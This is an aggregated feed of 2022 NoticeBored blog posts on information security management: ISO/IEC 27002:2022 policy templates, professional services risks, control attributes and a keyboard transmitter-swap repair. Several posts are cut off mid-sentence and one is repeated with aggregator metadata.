- Unsupervised learning: the system is fed unlabeled ('raw') input data that it autonomously mines for rules, detecting patterns, summarising and grouping data points to describe the data set and offer meaningful insights to users, even if the humans don't know what they're looking for.
- Reinforcement learning: the system learns from its interactions with the environment, utilising these observations to take actions that either maximise the reward or minimise the risk.

Aside from computerised AI, we humans use similar approaches naturally, for instance when developing and implementing information security policies:
- Linear sequence: start with some sort of list of desirable policies, sorted in some manner, working down from top to the bottom.

[2022-05-29T09:50:29+00:00] http://blog.noticebored.com/2022/05/algo-rhythmic-infosec.html

Iterative scientific infosec

Here's a simple, generic way to manage virtually anything, particularly complex and dynamic things:
1. Think of something to do
2. Try it
3. Watch what happens
4. Discover and learn
5. Identify potential improvements
6. GOTO 1

It's a naive programmer's version of Deming's plan-do-check-act cycle - an iterative approach to continuous improvement that has proven very successful in various fields over several decades.
Notice that it is rational, systematic and repeatable.

Here's a similar grossly-simplified outline of the classical experimental method that has proven equally successful over several centuries of scientific endeavour:
1. Consider available information
2. Propose a testable hypothesis
3. Test it (design and run experiments)
4. Watch what happens
5. Discover and learn
6. GOTO 1

Either way, I'm a committed fan. The iterative approach with incremental improvements works well. I approve.

Along the way, aside from pushing back the frontiers of science and technology and achieving remarkable advances for human society, we've also learned about the drawbacks and flaws in the processes, and we've developed assorted mechanisms to reduce the risks and increase our chances of success e.g.:
- Key to 'improving' or 'advancing' is to be able to recognise and ideally measure the improvement or advance - in most cases anyway. Improvements or advances that happen purely by chance ('discoveries') are welcome but rare treats.
- A big issue in quality assurance is the recognition that there are usually several competing and sometimes contradictory requirements/expectations, not least the definition of 'quality'. For certain customers, a rusty old heap of a car discovered in a barn is just as much the 'quality vehicle' as a Rolls Royce to its customers. Likewise, security improvements depend on one's persp

[2022-05-26T14:13:08+00:00] http://blog.noticebored.com/2022/05/iterative-scientific-infosec.html

Responsible disclosure - another new policy

We have just completed and released another topic-specific information security policy template, covering responsible disclosure (of vulnerabilities, mostly).

The policy encourages people to report any vulnerabilities or other information security issues they discover with the organisation's IT systems, networks, processes and people.
Management undertakes to investigate and address reports using a risk-based approach, reducing the time and effort required for spurious or trivial issues, while ensuring that more significant matters are prioritised. The policy distinguishes authorised from unauthorised security testing, and touches on ethical aspects such as hacking and premature disclosure.

It allows for reports to be made or escalated to Internal Audit, acting as a trustworthy, independent function, competent to undertake investigations dispassionately. This is a relief-valve for potentially sensitive or troublesome reports where the reporter is dubious of receiving fair, prompt treatment through the normal reporting mechanism - for instance, reporting on peers or managers.

It is primarily intended as an internal/corporate security policy applicable to workers ... but can be used as the basis for something to be published on your website, aimed at 'security researchers' and ethical hackers out there. There are notes about this at the end of the template. To be honest, there are plenty of free examples on the web but few if any are policies covering vulnerability disclosure by workers.

All that in just 3 pages, available as an MS Word document for $20 from SecAware.com.

I am working on another 2 new topic-specific policies as and when I get the time. Paradoxically, it takes me longer to prepare succinct policy templates than, say, guidelines or awareness briefings. I have to condense the topic down to its essentials without neglecting anything important. After a fair bit of research and thinking about what those essentials are, the actual drafting is fairly quick, despite the formalities. Preparing new product pages and uploading the templates plus product images then takes a while, especially for policies that relate to several others in the suite - which most do these days as the SecAware policy suite has expanded and matured.
As far as I know, SecAware has the broadest coverage of any info/cybersec policy suite on the market. Talking of which, I plan to package all the topic-specific policies together as a bulk deal before long. Having written them all, I know the suite is internally consistent in terms of the writing style, formatting, approach, coverage and level. It's also externally consistent in the sense of incorporating good security practices from the ISO27k and other standards.

[2022-05-21T15:49:50+00:00] http://blog.noticebored.com/2022/05/responsible-disclosure-another-new.html

Hacking the Microsoft Sculpt keyboard

In its infinite wisdom, Microsoft designed data encryption into the Sculpt wireless keyboard set to protect against wireless eavesdropping and other attacks. The keyboard allegedly* uses AES for symmetric encryption with a secret key burnt into the chips in the keyboard's very low power radio transmitter and the matching USB dongle receiver during manufacture: they are permanently paired together. The matching Sculpt mouse and Sculpt numeric keypad use the same dongle and both are presumably keyed and paired in the same way as the keyboard.

This design is more secure but less convenient than, say, Bluetooth pairing. The risk of hackers intercepting and successfully decoding my keypresses wirelessly is effectively zero. Nice! Unfortunately, the keyboard, keypad and mouse are all utterly dependent on the corresponding USB dongle, creating an availability issue. Being RF-based, RF jamming would be another availability threat.
Furthermore, I'm still vulnerable to upstream and downstream hacking - upstream meaning someone coercing or fooling me into particular activities such as typing-in specific character sequences (perhaps cribs for cryptanalysis), and downstream including phishers, keyloggers and other malware with access to the decrypted key codes etc.

So yesterday, after many, many happy hours of use, my Sculpt's unreliable Ctrl key and worn-out wrist rest finally got to me. I found another good-as-new Sculpt keyboard in the junkpile, but it was missing its critical USB dongle. The solution was to open up both keyboards and swap the coded transmitter from the old to the new keyboard - a simple 20 minute hardware hack.

In case I ever need to do it again, or for anyone else in the same situation, here are the detailed instructions:
1. Assemble the tools required: a small cross-head screwdriver; a stainless steel dental pick or small flat-head screwdriver; a plastic spudger or larger flat-head screwdriver (optional); a strong magnet (optional).
2. Start with the old keyboard. Peel off the 5 rubber feet under the keyboard, revealing 5 small screws. Set the feet aside to reapply later.
3. Remove all 5 screws. Note: the 3 screws under the wrist rest are slightly longer than the others, so keep them separate.
4. Carefully ease the wrist rest away from the base. It is a 'snap-fit' piece. I found I could lever it off using my thumbs at the left or right sides, then gradually work around the edge releasing it. You may prefer to use the spudger. It will flex a fair bit but it is surprisingly strong.
5. Under the wrist rest are anot

[2022-05-18T15:41:53+00:00] http://blog.noticebored.com/2022/05/hacking-microsoft-sculpt-keyboard.html

What actually drives information security?
The 'obvious' driver for information security is information risk: valuable yet vulnerable information must be secured/protected against anything that might compromise its confidentiality, integrity or availability, right? Given an infinite array of possible risks and finite resources to address them, information risk analysis and management techniques help us scan the risk landscape for things that stand out - the peaks - and so we play whack-a-mole, attempting to level the field through mitigating controls, remaining constantly on the lookout for erupting peaks and those hidden behind the ones we can see or were otherwise transparent.

That's 'obvious' from my perspective as an experienced information risk and security professional, anyway. Your perspective probably differs. You may look at things from a slightly or dramatically different angle - and that's fine. I see these as interesting and stimulating complementary approaches, not alternatives.

Compliance, for instance, is a strong driver in some cultures and organisations. Quality, efficiency and effectiveness drive others. Some seek to apply good practices, joining the pack. Customer-centric businesses naturally focus on customer satisfaction, brand values, loyalty etc. Startups are concerned to grow rapidly, hence anything that is or might become a barrier is a target. Government organisations, charities, professional services organisations, utilities, schools, assorted industries etc. all have their own focal points and concerns. Profits are clearly important for commercial organisations, but there are other financial measures too - and indeed many other things to measure. Information risk and security is incidental or supportive for most of them, enabling for some and essential for a select few whose business is information security, or the enlightened (as I like to call them).

So, in your own situation, consider the business perspective. What does management want/expect out of information security?
Along with what they do not want, or expect to avoid, these are worthwhile aspects to explore.

[2022-05-15T17:18:34+00:00] http://blog.noticebored.com/2022/05/what-actually-drives-information.html

Managing professional services engagements

In relation to professional services, management responsibilities are shared between client and provider, except where their interests and concerns diverge. Identifying and exploiting common interests goes beyond the commercial/financial arrangements, involving different levels and types of management:

- Strategic management: whereas some professional services may be seen as short-term point solutions to specific issues ("temping"), many have longer-term implications such as the prospect of repeat/future business if things work out so well that the engagement is clearly productive and beneficial to both parties. Establishing semi-permanent insourcing and outsourcing arrangements can involve substantial investments and risks with strategic implications, hence senior management should be involved in considering and deciding between various options, designing and instituting the appropriate governance and management arrangements, clarifying responsibilities and accountabilities etc. Organisations usually have several professional services suppliers and/or clients. Aside from managing individual relationships, the portfolio as a whole can be managed, perhaps exploiting synergistic business opportunities (e.g. existing suppliers offering additional professional services, or serving other parts of the client organisation or its business partners).
- Tactical and operational management: planning, conducting, monitoring and overseeing assignments within a professional services engagement obviously involves collaboration between client and provider, but may also affect and be affected by the remainder of their business activities. A simple example is the provision and direction of the people allocated to assignments, perhaps determining their priorities relative to other work obligations. If either party's management or workforce becomes overloaded or is distracted by other business, the other may need to help out and perhaps take the lead in order to meet agreed objectives - classic teamwork.
- Commercial management: negotiating and entering into binding contracts or agreements can be a risky process. Getting the best value out of the arrangements includes not just the mechanics of invoicing and settling the bills accurately and on time, but getting the most out of all the associated resources, including the information content.
- Relationship management: anyone over the age of ten will surely appreciate that relationships are tough! There are just so many dimensions to this, so much complexity and dynamics. In respect of professional services, there are both organisational and personal relationships to manage, while 'manage' is more about guiding, monitoring and reacting than directing and controlling. Despite the formalities of laws, contracts and policies, relationships seemingly play by their o

[2022-05-14T17:22:46+00:00] http://blog.noticebored.com/2022/05/managing-professional-services.html

AA privacy breach --> policy update?

According to a Radio New Zealand news report today:

"Hackers have taken names, addresses, contact details and expired credit card numbers from the AA Traveller website used between 2003 and 2018.
AA travel and tourism general manager Greg Leighton said the data was taken in August last year and AA Traveller found out in March. He said a lot of the data was not needed anymore, so it should have been deleted, and the breach "could have been prevented"."

The disclosure prompted the acting NZ Privacy Commissioner to opine that companies 'need a review policy':

"Acting Privacy Commissioner Liz Macpherson told Midday Report that if data was not needed it should be deleted ... Companies needed a review policy in place to determine if the data stored was necessary, or could be deleted, Macpherson said."

So I've looked through our SecAware information security policies to see whether we have it covered already, and sure enough we do - well, sort-of. Our privacy compliance policy template says, in part:

"IT systems, cloud services and business processes must comply fully with applicable privacy laws throughout the entire development lifecycle from initial specification through testing, release, operation, management and change, to final retirement. For example, genuine (as opposed to synthetic) personal information used during the development process (e.g. for testing) must be secured just as strongly as in production, and securely erased when no longer required."

The final clause in that paragraph refers to 'secure erasure' without specifying what that really means, and 'when no longer required' is just as vague as determining whether the data remains 'necessary'. That said, the remainder of the paragraph, and in fact the rest of the policy template, covers other relevant and equally important issues - including compliance with applicable p

[2022-05-11T18:51:20+00:00] http://blog.noticebored.com/2022/05/aa-privacy-breach-policy-update.html

How many metrics?
[2022-05-11T10:30:05+00:00] http://blog.noticebored.com/2022/05/how-many-metrics.html

Threat intelligence policy

I finally found the time today to complete and publish an information security policy template on threat intelligence. The policy supports the new control in ISO/IEC 27002:2022 clause 5.7: "Information relating to information security threats should be collected and analysed to produce threat intelligence."

The SecAware policy template goes a little further: rather than merely collecting and analysing threat intelligence, the organisation should ideally respond to threats - for example, avoiding or mitigating them. That, in turn, emphasises the value of 'actionable intelligence', in the same way that 'actionable security metrics' are worth more than 'coffee table'/'nice to know' metrics that are of no practical use. The point is that information quality is more important than its volume. This is an information integrity issue, as much as information availability.

The policy also mentions 'current and emerging threats'. This is a very tricky area because novel threats are generally obscure and often deliberately concealed in order to catch out the unwary. Maintaining vigilance for the early signs of new threat actors and attack methods is something that distinguishes competent, switched-on security analysts from, say, journalists.

The policy template costs just $20 from www.SecAware.com.
I'll be slaving away on other new policies this week, plugging a few remaining gaps in our policy suite - and I'll probably blog about that in due course.

[2022-05-11T09:25:05+00:00] http://blog.noticebored.com/2022/05/threat-intelligence-policy.html

Data masking and redaction policy

Last evening I completed and published another SecAware infosec policy template addressing ISO/IEC 27002:2022 clause 8.11 "Data masking":

"Data masking should be used in accordance with the organization's topic-specific policy on access control and other related topic-specific, and business requirements, taking applicable legislation into consideration."

The techniques for masking or redacting highly sensitive information from electronic and physical documents may appear quite straightforward. However, experience tells us the controls are error-prone and fragile: they generally fail-insecure, meaning that sensitive information is liable to be disclosed inappropriately. That, in turn, often leads to embarrassing and costly incidents with the possibility of prosecution and penalties for the organisation at fault, along with reputational damage and brand devaluation.

The policy therefore takes a risk-based approach, outlining a range of masking and redaction controls but recommending advice from competent specialists, particularly if the risks are significant.

The $20 policy template is available here.

Being a brand new policy, it hasn't yet had the benefit of the regular reviews and updates that our more mature policies enjoy ... so, if you spot issues or improvement opportunities, please get in touch.

As usual, I have masked/redacted the remainder of the policy for this blog and on SecAware.com by making an image of just the first half page or so, about one eighth of the document by size but closer to one quarter of the policy's information value.
So I'm giving you about $5's worth of information, maybe $4 since the extract is just an image rather than an editable document. On that basis, similar partial images of the 80-odd security policy templates offered through SecAware.com are worth around $320 in total. It's an investment, though, a way to demonstrate the breadth, quality, style and utility of our products and so convince potential buyers like you to invest in them.  ]]> 2022-05-11T09:24:18+00:00 http://blog.noticebored.com/2022/05/data-masking-and-redaction-policy.html www.secnews.physaphae.fr/article.php?IdArticle=4574987 False Guideline None None NoticeBored - Experienced IT Security professional Threat intelligence policy  I finally found the time today to complete and publish an information security policy template on threat intelligence. The policy supports the new control in ISO/IEC 27002:2022 clause 5.7: "Information relating to information security threats should be collected and analysed to produce threat intelligence."The SecAware policy goes a little further: rather than merely collecting and analysing threat intelligence, the organisation should ideally respond to threats - for example, avoiding or mitigating them. That, in turn, emphasises the value of 'actionable intelligence', in the same way that 'actionable security metrics' are worth more than 'coffee table'/'nice to know' metrics that are of no practical use. The point is that information quality is more important that its volume. This is an information integrity issue, as much as information availability.The policy also mentions 'current and emerging threats'. This is a very tricky area because novel threats are generally obscure and often deliberately concealed in order to catch out the unwary. Maintaining vigilance for the early signs of new threat actors and attack methods is something that distinguishes competent, switched-on security analysts from, say, journalists.The policy template costs just $20 from www.SecAware.com. 
I'll be slaving away on other new policies this week, plugging a few remaining gaps in our policy suite - and I'll probably blog about that in due course.

Source: http://blog.noticebored.com/2022/05/threat-intelligence-policy.html (2022-05-10T16:37:36+00:00)

Professional services - concluding phase

Having introduced this blog series and covered information risks applicable to the preliminary and operational phases of a professional services engagement, it's time to cover the third and final phase, when the engagement and business relationship come to an end.

Eventually, all relationships draw to a close. Professional services clients and providers go their separate ways, hopefully parting on good terms unless there were unresolved disagreements, issues or incidents (hinting at some information risks).

It is worth considering what will/might happen at the end of a professional services engagement as early as the preliminary pre-contract phase. Some of the controls need to be predetermined and pre-agreed in order to avoid or mitigate potentially serious risks later on. Straightforward in principle ... and yet easily neglected in the heady rush of getting the engagement going. This is not unlike a couple drawing up their "pre-nup" before a wedding, or a sensible organisation making suitable business continuity arrangements in case of severe incidents or disasters ahead.

A potentially significant information risk in the concluding phase stems from the inappropriate retention by either party of [access to] confidential information obtained or generated in the course of the engagement - whether commercially sensitive or personal information.
Imagine the implications of, say, a law firm being hit by a ransomware attack, office burglary or insider incident, giving miscreants access to its inadequately secured client casework files and archives. Meta-information about the engagement, assignment/s and contracts may also be commercially sensitive, for instance if the supplier deliberately under-priced the contract to secure the business and gain a foothold in the market, only to find it uneconomic to deliver the contracted services - a decidedly embarrassing situation if disclosed.

Information risks in this phase are amplified if the relationship e

Source: http://blog.noticebored.com/2022/04/professional-services-concluding-phase.html (2022-04-24T12:23:00+00:00)

Topic-specific policy 11/11: secure development

ISO/IEC 27002:2022 is another potential nightmare for the naïve and inexperienced policy author.

Policy scoping

Despite the context and presumed intent, the title of the standard's policy example ("secure development") doesn't explicitly refer to software or IT. Lots of things get developed - new products for instance, business relationships, people, corporate structures and so on. Yes, even security policies get developed! Most if not all developments involve information (requirements/objectives, specifications, plans, status/progress reports etc.) and hence information risks ... so the policy could cover those aspects, ballooning in scope from what was presumably intended when the standard was drafted.

Even if the scope of the policy is constrained to the IT context, the information security controls potentially required in, say, software development are many and varied, just as the development and associated methods are many and varied, and more poignantly so too are the information risks.
Policy development

Your homework challenge, today, is to consider, compare and contrast these five markedly different IT development scenarios:

1. Commercial firmware being developed for a small smart actuator/sensor device (a thing) destined to be physically embedded in the pneumatic braking system of commercial vehicles such as trucks and coaches, by a specialist OEM supplier selected on the basis of lowest price.
2. A long-overdue technical update and refresh for a German bank's mature financial management application, developed over a decade ago by a team of contractors long since dispersed or retired, based on an obsolete database, with fragmentary documentation in broken English and substantial compliance implications, being conducted by a large software house based entirely in India.
3. A cloud-based TV program scheduling system for a global broadcaster, to be delivered iteratively over the next two years by a small team of contractors under the management of a consultancy firm, for a client that freely admits it barely understands phase 1 and essentially has no idea what might be required next, or when.
4. A departmental spreadsheet for time recording by home workers, so their time can be tracked and recharged to clients, and their productivity can be monitored by management.
5. Custom hardware, firmware and autonomous software required for a scientific exploration of the Marianas trench - to be deployed in the only two deep-sea drones in existence that are physically capable of delivering and recovering the payload at the extreme depths required.

You may have worked in or with projects/initiatives vaguely similar to one, maybe even two or three of these, but probably not all five - and th

Source: http://blog.noticebored.com/2021/10/topic-specific-example-1111-secure.html (2022-04-23T18:06:15+00:00)

Topic-specific policy 10/11: management of technical vulnerabilities

In ISO/IEC 27002:2022, "management of technical vulnerabilities" is the kind of phrase that speaks volumes to [some, switched-on, security-aware] IT pros ... and leaves ord'nry folk perplexed, befuddled and nonplussed. In this case, that may be appropriate if it aligns with the intended audience for the policy, perhaps not if the policy needs to be read, understood and complied with by, say, workers in general, for whom "patching" is arguably a more apt and widely-known term.

So, do you need to tell workers to keep their IT systems, smartphones and IoT things up to date with security patches? If so, before launching into the policy development process, think very carefully about the title, content and style of your policy - plus the associated procedures, guidelines, awareness and training materials, help-desk scripts or whatever you decide is necessary to achieve your information risk management objectives in this regard (more on that below).

Hinson tip: what are your information risk management objectives in this regard (concerning 'technical vulnerabilities' ... or whatever aspect/s you believe need addressing)? What information risks are you facing, how significant are they (relative to other things on your plate) and how do you intend to treat them? Seriously, think about it. Talk it through with your peers and professional colleagues. Draft a cunning treatment plan for this particular subset of information risks, discuss it with management and refine it.
Lather, rinse, repeat until you achieve consensus (or wear down the blockers and negotiate a fragile settlement), and finally you are primed to craft your policy.

Once more, we have your starter-for-ten, a generic patching policy template designed to help get you smartly off the starting blocks:

While we don't presently offer a policy template on vulnerability disclosures (something worth adding to our to-do list, maybe?), we do have others that are to some extent relevant to this topic, for instance on change and configuration management and information systems security. I'll pick up on that point at the end of this blog series.

Aside f

Source: http://blog.noticebored.com/2021/10/topic-specific-example-1011-management.html (2022-04-23T18:05:53+00:00)

Professional services - operational

Following on from the preliminary phase I covered yesterday, the longest phase of most professional services engagements is the part where the services are delivered. With the contractual formalities out of the way, the supplier starts the service, providing consultancy support or specialist advice. The client receives and utilises the service. Both 'sides' are important to both parties, since a professional service that isn't delivered and used doesn't generate value for the client, and is unlikely to lead to repeat business - such as additional assignments:

Deliberately taking a simplistic view once again, I have represented 'assignments' (which may be projects, jobs, tasks or whatever) as discrete pieces of work, each with a beginning, middle and end:

Things are never so neat and tidy in practice. Some assignments may never really get off the ground, and some gradually diminish or peter out rather than coming to an abrupt end. On-again-off-again assignments are challenging to plan and resource. Assignments may blend into each other or split apart.
If the same supplier resources (mostly people) are involved in multiple assignments, possibly for multiple clients, t

Source: http://blog.noticebored.com/2022/04/professional-services-operational.html (2022-04-23T12:40:00+00:00)

EU to standardise on ISO 31000 and ISO/IEC 27005?

"Risk management procedures are fundamental processes to prepare organisations for a future cybersecurity attack, to evaluate products and services for their resistance to potential attacks before placing them on the market, and to prevent supply chain fraud" says ENISA in the report "RISK MANAGEMENT STANDARDS - Analysis of standardisation requirements in support of cybersecurity policy", published in March 2022.

Not to be left behind, ENISA - originally the European Network and Information Security Agency (an official agency of the EU) - leapt aboard the cyber bandwagon, rebranding itself "The European Union Agency for Cybersecurity" when it became a permanent EU agency under the European Cybersecurity Act, regulation (EU) 2019/881.

Despite the vague title, RISK MANAGEMENT STANDARDS in fact primarily concerns "risk management [and] security of ICT products, ICT services and ICT processes", where 'risk' means "any reasonably identifiable circumstance or event having a potential adverse effect on the security of network and information systems." Apparently, "The main goal of risk management is (in general) to protect ICT products (software, hardware, systems, components, services) and business assets, and minimise costs in cases of failures. Thus it represents a core duty for successful business or IT management." In other words, the ENISA document revolves primarily around IT risks, although it does casually mention 'enterprise risk management', which takes in operational, market, supply chain, project, strategic and other risks.
Unfortunately, I haven't dug deep enough yet to reveal actual definitions of key terms such as "cybersecurity" or "sector". Evidently, we are supposed to just know what they mean. It doesn't help that the cited "Methodology for Sectoral Cybersecurity Assessments 2021" official download appears to be broken, but consulting another source I see that it doesn't even define those terms anyway. Furthermore, an embedded diagram suggests an unconventional interpretation of 'risk' and 'exposure', while 'threat' seemingly disregards unintentional and untargeted threats such as generic malware, accidents and storms:

Source: http://blog.noticebored.com/2022/04/eu-to-standardise-on-iso-31000-and.html (2022-04-23T11:09:24+00:00)

Professional services - preliminaries

a guideline on the information risk, security and privacy aspects of professional services. I introduced a simplistic 3-phase model for the business relationship through which one or more professional services assignments are delivered and consumed. Today, I'm exploring the preliminary phase.

Before professional services are delivered, client and provider form a business relationship. They determine the professional services required and offered, and of course negotiate the commercial arrangements. They also have the opportunity to decide how the services are to be provided, and how both the assignment/s and the business relationship are to be managed.

Contracting is an important control in its own right, with significant information and commercial risks associated.
The contract may, for instance:

- Be inappropriate for either organisation, the relationship and/or the professional service/s;
- Be informal, undocumented, invalid and hence unenforceable;
- Bypass or shortcut due process;
- Be uneconomic for either party;
- Be unfair, biased and perhaps unethical;
- Lead to problems if an assignment fails or the whole relationship turns sour, perhaps as a result of an incident.

Contracting is a chance for both organisations to think forward, discuss and agree the governance, management, compliance, security/privacy, control and assurance needed for the remainder of the professional services lifecycle (both phases!). It may be infeasible, later on, to modify the terms or specify additional requirements and the associated arrangements for integrity, confidentiality, incident management etc., especially if relationship issues arise.

Also at this stage, client and provider conduct some form of due diligence checks on each other, exploring factors such as solvency, competence, qualifications, certifications and reputations.
The manner in which both parties participate in this phase can be a valuable predictive indicator - a big clue as to how things are likely to pan out later, e.g.:

Appreciation of each party's capabilities and concerns, plus their common interests in making a commercial success of the planned assignment/s and the business relationship as a whol

Source: http://blog.noticebored.com/2022/04/professional-services-preliminaries.html (2022-04-22T09:26:38+00:00)

Information risk and security for professional services

Source: http://blog.noticebored.com/2022/04/information-risk-and-security-for.html (2022-04-21T17:39:36+00:00)

Value-based infosec

This week in an ISO27k Forum thread about selecting information security controls from ISO/IEC 27002, Ross told us "cost is always A factor, however more accurately, the "Cost-Benefit Ratio" may become a deciding factor. A general principle is that the cost of implementing a risk treatment should never exceed the value of the asset being protected. Determining the 'value' of the 'asset' might be tricky (e.g. impact to brand value when considering consequential reputational risk), however someone within an organisation often has an existing view on this value."

Clearly security controls should save more than they cost, hence in theory organisations should only invest in, operate and maintain controls that are valuable ... but in reality, value-based information risk and security management is far from straightforward.

For starters, we have no choice with some controls: even in a greenfield situation such as a high-tech startup, the very act of designing and building the company depends on a raft of governance and management controls.

Next, consider the costs.
Controls have lifecycles, incurring costs at every stage, starting even before we develop or procure them since someone has to determine the requirements, then specify and search for solutions, then implement and configure them. Once operational, there are costs associated with using controls, plus generally they need to be monitored, managed and maintained, and perhaps eventually retired or replaced. Being tricky to measure, it is tempting to ignore these costs, lumping them in with all the other costs of doing business ... which may explain the failure of some kinds of control. Complex controls require significant care and attention to keep them operating efficiently and effectively.

Thirdly, consider the benefits. Information security controls rarely eliminate information risks: usually, the best we can hope for is partial mitigation - reducing the probability and/or impact of certain types of incident - and even that is uncertain without associated controls such as monitoring, compliance and assurance. What is the $ value of reducing information risks? If a given control had not been selected and put into operation, how costly would any corresponding incidents

Source: http://blog.noticebored.com/2022/04/value-based-infosec.html (2022-04-15T09:09:24+00:00)

Domotics - a can-o-worms

Source: http://blog.noticebored.com/2022/04/domotics-can-o-worms.html (2022-04-13T07:25:27+00:00)

Infosec control attributes paper completed

Yesterday, I completed and published the white paper on information security control attributes.
Today I drafted a set of comments on ISO/IEC JTC 1/SC 27's proposed Preliminary Work Item for ISO/IEC 27028, using content from the white paper to build a 'donor document' with fairly minor changes in accordance with ISO's required structure and format. It includes the following summary:

"This document extends the concept of 'control attributes' introduced in ISO/IEC 27002:2022, discussing a wider variety of factors potentially worth bearing in mind when considering, selecting, designing, using and reviewing information security controls. Control attributes are a powerful and flexible tool for information security management purposes, a novel way to design, manage and improve an organisation's approach to mitigating unacceptable information risks, supplementing more traditional or conventional methods. The document includes pragmatic suggestions on how to make use of control attributes in the business context, with a worked example illustrating the approach."

Once the comments are submitted, we must wait patiently to see how much of it (if any!) makes it through to the Working Draft, blended with inputs and comments from other committee members. Although it seems to take 'forever' to develop new standards, I'm hoping that the donor document will set the project off to a flying start.

Meanwhile, I'm actively looking for opportunities for clients to start using control attributes as an integral part of their ISO27k information risk and security management activities - designing better, more relevant and meaningful security metrics for instance. If that or any other ideas in the paper catch your imagination, please comment below or email me (Gary@isect.com).
I see a lot of potential business value in control attributes: how about you?

Source: http://blog.noticebored.com/2022/04/infosec-control-attributes-paper.html (2022-04-05T17:31:41+00:00)

The nine controls ISO/IEC 27002 missed

Despite the excellent work done to restructure and update the standard, I still feel some commonplace 'good practice' information security controls are either Missing In Action or inadequately covered by ISO/IEC 27002:2022, these nine for example:

- Business continuity controls, covering resilience, recovery and contingency aspects in general, not just in the IT security or IT domains. ISO 22301 is an excellent reference here, enabling organisations to identify, rationally evaluate and sensibly treat both high-probability x low-impact and low-probability x high-impact information risks (the orange zone on probability-impact graphics), not just the obvious double-highs (the reds and flashing crimsons!). Therefore, '27002 could usefully introduce/summarise the approach and refer readers to '22301 and other sources for the details.

- Availability and integrity controls supporting/enabling the exploitation of high-quality, up-to-date, trustworthy business information and opportunities for legitimate purposes within the constraints of applicable policies, laws, regulations etc., even when this means deliberately taking chances (accepting risks!) to secure business opportunities. Also, I'd like to see, somewhere in the ISO27k series, clearer advice on how to tackle the trade-off between control and utility: information that is too tightly secured loses its value, just as it does if inadequately secured ... and that in turn leads to the idea of at least mentioning financial and general business controls relating to information risk and security (e.g. budgeting, project investments, resourcing, cost accounting, incident and impact costing, valuing intangible assets, directing and motivating specialists: these are all important but tricky areas, so advice would help improve the effectiveness and efficiency of information security). [Some of this is covered, albeit quite academically rather than pragmatically, in ISO/IEC 27014 and '27016, and outside the ISO27k realm.]

- Health and safety controls protecting 'our most valuable assets', providing a supportive work environment that is conducive to getting the most out of our people, and ensuring the safety of our customers using our products. As with business continuity, H&S is pretty well covered by other standards plus laws and regs ... although, arguably, there's much more left to say, yet, on mental health (e.g. the long-term adverse health effects of excessive stress, both on and off the job), with significant implications for information risks

Source: http://blog.noticebored.com/2022/03/the-nine-controls-isoiec-27002-missed.html (2022-03-15T16:36:29+00:00)

Information risk and security management reporting

Last Thursday, a member of the ISO27k Forum launched a new discussion thread with this poser (lightly edited):

"Having recently become an ISMS coordinator, I must prepare a monthly report to management. How does one write an information security report? What should be reported?"

Over the weekend we've raised and debated a bunch of ideas, such as a tiered approach, starting at the detailed operational level with effectiveness metrics for the selected information security controls, then aggregating and summarising information for less frequent reports to higher management, emphasising the business perspective (e.g. reporting not just the number of incidents, but a breakdown by severity level mapping to business impacts for senior management).
Source: http://blog.noticebored.com/2022/03/information-risk-and-security.html (2022-03-14T20:24:00+00:00)

Information security control attributes

Today I completed and published a 20-page white paper about 'control attributes', inspired by those used in ISO/IEC 27002:2022. The concept behind the paper has been quietly brewing for a couple of months or more, taking the past few weeks to crystallise into words in a form that I'm happy to share publicly.

In a nutshell, 'attributes' are characteristics or features that can be used to categorise, sort or rank information security controls by various criteria. That simplistic concept turns out to unlock some powerful possibilities, described pragmatically in the paper. It's a more innovative and valuable technique than it may appear.

Along the way, I regret inadvertently upsetting the team of JTC 1/SC 27 editors working on ISO/IEC 27028 by sharing an incomplete draft with them in the hope it might become the basis of the initial draft of the new standard. During a Zoom meeting. At 3:00am, NZ time. I wasn't at my best. Ooops.

Anyway, now the paper is 'finished' and published, I'm hoping to prompt debate and insightful comments, gathering useful feedback and especially improvement suggestions from readers, leading in turn to a better document to submit (through the proper process, this time!) to the SC 27 project team. We may unfortunately have missed our opportunity to deliver a complete 'donor document' to use as the first working draft of the new standard, but all is not lost. The paper's suggestions on how to use attributes will, I hope, make a substantial contribution to the second working draft, and in time inform the issued standard. It is published under a Creative Commons licence.
Exposure, discussion and insightful comment is what I'm after so, in addition to this blog, I have notified the 4,500 members of the ISO27k Forum about the paper and released it to an unknown number of LinkeDinners.

Care to join the gang? Download the paper here. Share and discuss it with your peers and colleagues. Rip it to shred

Source: http://blog.noticebored.com/2022/03/infomation-security-control-attributes.html (2022-03-01T20:18:41+00:00)

Transition arrangements for ISO/IEC 27001

The completely restructured ISO/IEC 27002:2022 has naturally prompted a rash of questions from anxious ISO27k users around the world about the implications for ISO/IEC 27001:2013, particularly on the certification aspects since '27002:2022 no longer aligns with '27001:2013 Annex A.

The situation, today, is that ISO/IEC 27001:2013, plus the associated accreditation and certification processes, remain exactly as they were:

- Organisations that chose to adopt the standard are required to use Annex A of '27001:2013 to check that they have not accidentally neglected any relevant/necessary information security controls, documenting the associated justified decisions to include/exclude the controls in a Statement of Applicability.
- Accredited certification bodies are required to confirm that clients comply with the mandatory obligations in '27001:2013, including that SoA requirement among others, both during the initial certifications and any subsequent interim audits and re-certifications.

In other words, it's business as usual ...
but looking forward, there are of course changes afoot. A formal amendment to ISO/IEC 27001:2013 is currently being prepared:

A draft of the amendment is already available through ISO if you can't wait for it to be finalised and released - which I understand is expected to happen in the next few months, possibly as late as August 2022 but hopefully sooner. The draft amendment essentially replaces Annex A with an equivalent that references and summarises the controls from ISO/IEC 27002:2022. It is likely to retain the succinct tabular format of the original Annex A, i.e. it will reference each control by its '27002:2022 clause number prefixed with "A." (for Annex A), then state the control's title, followed by a single sentence outlining the control. As before, it will not elaborate on that outline: readers should consult '27002 for the supporting explanation and implementation advice - typically half a page of detail per control - and/or look to other sources of guidance, of which there are many.

There may also be minor wording changes in the main body clause about the SoA, specifically in the notes for clause 6.1.3. More specifically:

Source: http://blog.noticebored.com/2022/02/transition-arrangements-for-isoiec-27001.html (2022-02-25T12:38:34+00:00)

ISO/IEC 27002 update

SecAware ISMS templates such as the detailed security controls maturity metric/checklist:

Source: http://blog.noticebored.com/2022/02/isoiec-27002-update.html (2022-02-21T20:23:11+00:00)

Weaving strategies with policies

I mentioned recently here on the blog that there can be strategic elements to policies, just as there are operational aspects to the supporting procedures and guidelines.
With the new year fast approaching, I'd like to explore that further today.

Warning: your blinkers are coming off. Prepare for the glare.

